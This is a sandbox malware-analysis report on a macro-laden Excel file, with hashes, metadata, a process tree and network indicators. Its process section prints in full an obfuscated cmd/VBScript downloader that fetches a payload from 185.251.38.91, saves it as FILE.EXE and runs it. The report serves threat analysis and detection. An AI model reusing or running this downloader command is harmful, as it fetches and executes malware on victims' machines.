analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

0889264f3e4d08c5f794a156de02624bca3c01f0b921042e2245f168767dd48e.xls

Full analysis: https://app.any.run/tasks/884603c6-15bf-4b0a-8a83-104420253235
Verdict: Malicious activity
Analysis date: April 25, 2019, 01:51:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1251, Last Saved By: google, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Nov 18 03:33:42 2009, Last Saved Time/Date: Wed Apr 24 04:32:14 2019, Security: 0
MD5:

CB86E9667EB9C638C1CB160ADB9CA788

SHA1:

5EBAAC8906EB78730C66EB687A407AE3A9F01AFA

SHA256:

0889264F3E4D08C5F794A156DE02624BCA3C01F0B921042E2245F168767DD48E

SSDEEP:

768:t8ow146iDUP10uOLlxILok6VeBWcu6n/dgAZjA8vp9f68rnd:Xw146iDUP10uOLlxILok6VeBWcln/dgi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2580)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2580)
  • SUSPICIOUS

    • Executes scripts

      • CMd.exe (PID: 3192)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2580)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

LastModifiedBy: google
Software: Microsoft Excel
CreateDate: 2009:11:18 03:33:42
ModifyDate: 2019:04:24 03:32:14
Security: None
CodePage: Windows Cyrillic
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Sheet1
  • Sheet2
  • Sheet3
HeadingPairs:
  • Листы
  • 3
CompObjUserTypeLen: 26
CompObjUserType: ???? Microsoft Excel 2003
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs wscript.exe timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2580"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3192CMd /c cd %TEMP% & @ECHO B4c= "http://185.251.38.91/foto.jpg">>K5i.VBS &@ECHO M8d = Y0k("RUXQ:QdQ")>>K5i.VBS &@ECHO Set N5g = CreateObject(Y0k("Y_dYX>:dYXT``\"))>>K5i.VBS &@ECHO N5g.Open Y0k("SQ`"), B4c, False>>K5i.VBS &@ECHO N5g.send ("")>>K5i.VBS &@ECHO Set L0p = CreateObject(Y0k("MP[PN:_`^QMY"))>>K5i.VBS &@ECHO L0p.Open>>K5i.VBS &@ECHO L0p.Type = 1 >>K5i.VBS &@eCHo L0p.Write N5g.ResponseBody>>K5i.VBS &@ECHO L0p.Position = 0 >>K5i.VBS &@ECHO L0p.SaveToFile M8d, 2 >>K5i.VBS &@ECHO L0p.Close>>K5i.VBS &@ECHO function Y0k(D0r) >> K5i.VBS &@ECHO For K5x = 1 To Len(D0r) >>K5i.VBS &@ECHO O1u = Mid(D0r, K5x, 1) >>K5i.VBS &@ECHO O1u = Chr(Asc(O1u)- 12) >>K5i.VBS &@ECHO I5b = I5b + O1u >> K5i.VBS &@ECHO Next >>K5i.VBS &@ECHO Y0k = I5b >>K5i.VBS &@ECHO End Function >>K5i.VBS & K5i.VBS &dEl K5i.VBS & tIMeOUT 13 & FILE.EXEC:\Windows\system32\CMd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1512"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\K5i.VBS" C:\Windows\System32\WScript.exe
CMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3272tIMeOUT 13 C:\Windows\system32\timeout.exeCMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
928
Read events
879
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
20
Unknown types
0

Dropped files

PID
Process
Filename
Type
2580EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR63DC.tmp.cvr
MD5:
SHA256:
3192CMd.exeC:\Users\admin\AppData\Local\Temp\K5i.VBStext
MD5:FEE0BA8CBE7A67F4967884AEF523A4C5
SHA256:A38C58BCB673A1864F18805494FBC3AE02AC9470479FF3A1A420FD748986DC9A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1512
WScript.exe
GET
185.251.38.91:80
http://185.251.38.91/foto.jpg
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
185.251.38.91:80
malicious

DNS requests

No data

Threats

No threats detected
No debug info